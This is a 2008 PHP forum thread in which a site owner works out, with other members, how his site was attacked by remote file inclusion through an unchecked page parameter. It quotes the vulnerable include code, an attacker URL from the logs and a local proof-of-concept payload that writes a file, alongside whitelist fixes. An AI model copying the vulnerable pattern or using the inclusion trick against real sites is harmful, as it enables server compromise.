Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 14 of 14
  1. #1
    Regular Coder
    Join Date
    Feb 2005
    Posts
    663
    Thanks
    5
    Thanked 14 Times in 14 Posts

    Finding Hack Attack

    Someone's been hacking my site recently, and I'm trying to learn how to discover which file(s) the hack is coming from.

    I'm looking through my sites raw logs trying to uncover something, but its kind of like gibberish to me. I do see this in there though, and wondering if this could be the start of the attack. And if so, if anyone can offer some insight on how to stop it.

    index.php?page=http://spr0x.kit.net/.......

  • #2
    Senior Coder CFMaBiSmAd's Avatar
    Join Date
    Oct 2006
    Location
    Denver, Colorado USA
    Posts
    3,075
    Thanks
    2
    Thanked 320 Times in 312 Posts
    It depends on what index.php does with the $_GET['page'] parameter.

    If you are doing an include() without verifying that the values are what you expect, then content from another site would be placed into your php code. Any raw php code in the included content would then be executed on your server.
    Last edited by CFMaBiSmAd; 01-17-2008 at 02:07 PM. Reason: reword to make clear
    If you are learning PHP, developing PHP code, or debugging PHP code, do yourself a favor and check your web server log for errors and/or turn on full PHP error reporting in php.ini or in a .htaccess file to get PHP to help you.

  • #3
    Regular Coder
    Join Date
    Feb 2005
    Posts
    663
    Thanks
    5
    Thanked 14 Times in 14 Posts
    Well, I've been working with alot of code first developed by others to help me learn. but the index page isn't that complex and appears secure from the little I've learned. It basically has this code:

    PHP Code:
    $current_page=$_GET[page];
        if (
    $_GET[page]==""){
            
    $current_page="homepage";
        } 
    And then this below it get the page

    PHP Code:
    <div id="index_container">
                      <?php require_once("".$current_page.".php"); ?>
        </div>

  • #4
    Senior Coder CFMaBiSmAd's Avatar
    Join Date
    Oct 2006
    Location
    Denver, Colorado USA
    Posts
    3,075
    Thanks
    2
    Thanked 320 Times in 312 Posts
    All I need to do with that is use index.php?page=http://myurl/mypath/mypage and have a file mypage.php with php disabled for files in the mypath folder and your code will do -

    PHP Code:
    <?php require_once("http://myurl/mypath/mypage.php"); ?>
    and any php code that I put in mypage.php (which I have caused my server to not be parsed by php on my server) will be included and run on your server.

    Hack complete!

    You need to put a list of allowable page names in an array and then use the in_array() function to test that $_GET['page'] is only one of the acceptable values.

    I know we have said it many times before, but here it is again - ALL external data cannot be trusted and needs to be validated by your code before you use it in any way.

    Edit: The remote site can also just have php code that echo's out the php code it wants. So, it is not even necessary to go to the trouble to disable the parsing of php files.
    Last edited by CFMaBiSmAd; 01-17-2008 at 03:32 PM.
    If you are learning PHP, developing PHP code, or debugging PHP code, do yourself a favor and check your web server log for errors and/or turn on full PHP error reporting in php.ini or in a .htaccess file to get PHP to help you.

  • #5
    Regular Coder
    Join Date
    Feb 2005
    Posts
    663
    Thanks
    5
    Thanked 14 Times in 14 Posts
    ok, trying to follow what you said, and just put this together, and it does work. So this should stop someone from doing that?

    PHP Code:
    $page = array(
        
    "page_1"
        
    "page_2"
        
    "page_3"
        
    "page_4");
        
    if (
    in_array($_GET[page], $page)) {
        
    $current_page $_GET[page];
    } else {
        
    $current_page 'homepage';

    I was also wondering if there is another approach? Perhaps to have sometype of function check if the $_GET[page] is a file on your website, and if its not to ignore it?

  • #6
    Senior Coder CFMaBiSmAd's Avatar
    Join Date
    Oct 2006
    Location
    Denver, Colorado USA
    Posts
    3,075
    Thanks
    2
    Thanked 320 Times in 312 Posts
    Yes you could check if there is a file on your system with the file name made from the GET parameter.

    I would not use file_exists() or is_file(). These two functions currently don't support the http/https protocol, but if they do in the future and you use either of them to check $_GET['page'], the http://url might pass the test at some point under future versions of php.

    It is always best to make a list of expected values (everything is within your control) and then compare what you received (something outside of your control) with those values instead of testing the received value directly (by specially formatting or encoding the value, a hole in a direct test could be exploited so that the value passes the test.)

    I would use something like the glob() function, which returns an array of file names, to get a list of files expected, then either use an array comparison/search function or the in_array() function to check if the received value is in the array of expected files.
    If you are learning PHP, developing PHP code, or debugging PHP code, do yourself a favor and check your web server log for errors and/or turn on full PHP error reporting in php.ini or in a .htaccess file to get PHP to help you.

  • #7
    Master Coder
    Join Date
    Dec 2007
    Posts
    6,682
    Thanks
    436
    Thanked 890 Times in 879 Posts
    Quote Originally Posted by ptmuldoon View Post
    ok, trying to follow what you said, and just put this together, and it does work. So this should stop someone from doing that?

    PHP Code:
    $page = array(
        
    "page_1"
        
    "page_2"
        
    "page_3"
        
    "page_4");
        
    if (
    in_array($_GET[page], $page)) {
        
    $current_page $_GET[page];
    } else {
        
    $current_page 'homepage';

    I was also wondering if there is another approach? Perhaps to have sometype of function check if the $_GET[page] is a file on your website, and if its not to ignore it?
    PHP Code:
    if(isset($_GET) && isset($_GET['page'])){
      
    // check $_GET['page'] values, as you done above or other way
      // put you stuff here.
    }
    exit; 
    // stop here every thing else 
    this avoid a request such:

    Code:
    http://your-domain/index.php?current_page=http://his-domain
    any request passed to index.php, must pass at least three check:
    - is a valid parameter name, not "", or something you don't use
    - it's value is valid for a specific parameter
    - don't contain escape secvences, something that could affect your code

    best regards
    Last edited by oesxyl; 01-17-2008 at 04:21 PM.

  • #8
    Regular Coder
    Join Date
    Feb 2005
    Posts
    663
    Thanks
    5
    Thanked 14 Times in 14 Posts
    Searching out the glob() function, I found what looks to be a good function to use. Just not sure how to incorporate yet.

    PHP Code:
    /* alpharead version 3: This function returns an array containing the names of the files inside any given folder, excluding files that start with a '.', as well as the filenames listed in the '$killit' array. This array is sorted using the 'natural alphabetical' sorting manner. If no input is given to the function, it lists items in the script's interpreted folder. Version 3 fixes a MAJOR bug in version 2 which corrupted certain arrays with greater than 5 keys and one of the supposedly removed filenames.
    written by Admiral at NuclearPixel.com */

    function alpharead3($dir){
    if(!
    $dir){$dir '.';}
    foreach(
    glob("$dir/*") as $item){$sort[]= end(explode('/',$item));}

    $killit = array('index.html''index.php''thumbs.db''styles.css');
    $killcounter 0;
    foreach(
    $sort as $sorteditem){
    foreach(
    $killit as $killcheck){
    if(
    strtolower($sorteditem) == strtolower($killcheck))
    {unset(
    $sort[$killcounter]);}
    }
    $killcounter++;}
    if(
    $sort){natsort($sort);}
    foreach(
    $sort as $item){$return[]= $item;}

    if(!
    $return){return array();}
    return 
    $return;


  • #9
    Rockstar Coder
    Join Date
    Jun 2002
    Location
    USA
    Posts
    9,074
    Thanks
    1
    Thanked 328 Times in 324 Posts
    How many pages does your site have? If it is a small enough site, just keeping an array in an include of the valid files would be faster than going to disk and checking for each page request.
    OracleGuy

  • #10
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    Would this do?
    PHP Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Untitled Document</title>
    </head>

    <body>
    <?php
    # default page
    $default 'inc/home.php';

    # list of all site pages + the id they will be called by
    $pages = array('about' => 'inc/about.php','contact' => 'inc/contact.php','register' => 'inc/register.php','listings' => 'inc/listings.php','search' => 'inc/search.php');
    if(
    array_key_exists($_GET['page'], $pages))
    {
        foreach(
    $pages as $pageid => $pagename)
        {
            if(
    $_GET['page'] == $pageid && file_exists($pagename))
            {
                
    /* if somebody's making a request for ?page=xxx and
                the page exists in the $pages array, we display it
                checking first it also exists as a page on the server */
                
    include $pagename;
            }
        } 
    // end foreach
    }
    else
    {
        
    /* if the page isn't listed in $pages, or there's no ?page=xxx request
        we show the default page, again we'll also just make sure it exists as a file
        on the server */
        
    if(file_exists($default)) include $default;
    }
    ?>
    </body>
    </html>
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #11
    Regular Coder
    Join Date
    Feb 2005
    Posts
    663
    Thanks
    5
    Thanked 14 Times in 14 Posts
    I'm also trying to test and learn if this was indeed done on my site. So, in testing locally, I've have the following url:

    index.php?page=http://localhost/hacktest/direct.php

    and in my direct.php file, I'm trying to create a file.

    PHP Code:
    $ourFileName "testFile.txt";
        
    $ourFileHandle fopen($ourFileName'w') or die("can't open file");
        
    fclose($ourFileHandle); 
    If I call the direct.php directly, the file is made in my hacktest directory. But when I call the file as appended to my index.php, the file is not created. Should it be created in the same directory where the index.php file is?

  • #12
    Senior Coder CFMaBiSmAd's Avatar
    Join Date
    Oct 2006
    Location
    Denver, Colorado USA
    Posts
    3,075
    Thanks
    2
    Thanked 320 Times in 312 Posts
    For your testing. Your existing code adds the .php to the end of the file so the URL is -

    index.php?page=http://localhost/hacktest/direct

    And since php is probably parsing the direct.php file on your server, use the following for direct.php, including the <?php and ?> tags in the file -

    PHP Code:
    <?php
    echo '<?php
    $ourFileName = "testFile.txt";
        $ourFileHandle = fopen($ourFileName, "w") or die("can\'t open file");
        fwrite($ourFileHandle,"You got hacked");
        fclose($ourFileHandle);  
        ?>'
    ;
    ?>
    If you are learning PHP, developing PHP code, or debugging PHP code, do yourself a favor and check your web server log for errors and/or turn on full PHP error reporting in php.ini or in a .htaccess file to get PHP to help you.

  • #13
    Regular Coder
    Join Date
    Feb 2005
    Posts
    663
    Thanks
    5
    Thanked 14 Times in 14 Posts
    ok, thanks, I'll have to try that out this afternoon.

    I think I've gotten things locked down now, but someone is still trying to access these old files on my site. In my error logs, I'm seeing the below. I'm not sure if there is anything that I can do about it, other than trying to block the IPs.

    [Fri Jan 18 13:52:04 2008] [error] [client 83.79.31.222] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:51:52 2008] [error] [client 83.79.31.222] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:49:04 2008] [error] [client 201.210.214.67] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:49:02 2008] [error] [client 201.210.214.67] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:48:57 2008] [error] [client 201.210.214.67] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:36:33 2008] [error] [client 201.33.39.211] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:36:32 2008] [error] [client 201.33.39.211] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:36:31 2008] [error] [client 201.33.39.211] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:36:26 2008] [error] [client 201.33.39.211] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:33:35 2008] [error] [client 200.103.241.242] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:33:29 2008] [error] [client 200.103.241.242] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:30:47 2008] [error] [client 195.8.6.185] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:30:34 2008] [error] [client 195.8.6.185] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:27:54 2008] [error] [client 201.9.57.232] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:27:46 2008] [error] [client 201.9.57.232] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:26:51 2008] [error] [client 201.9.57.232] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php

  • #14
    Rockstar Coder
    Join Date
    Jun 2002
    Location
    USA
    Posts
    9,074
    Thanks
    1
    Thanked 328 Times in 324 Posts
    You have to be careful when blocking IPs since potentially lots of people can be behind a single IP. But the important thing is that you have your site locked down and they can't exploit the security hole anymore.
    OracleGuy


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •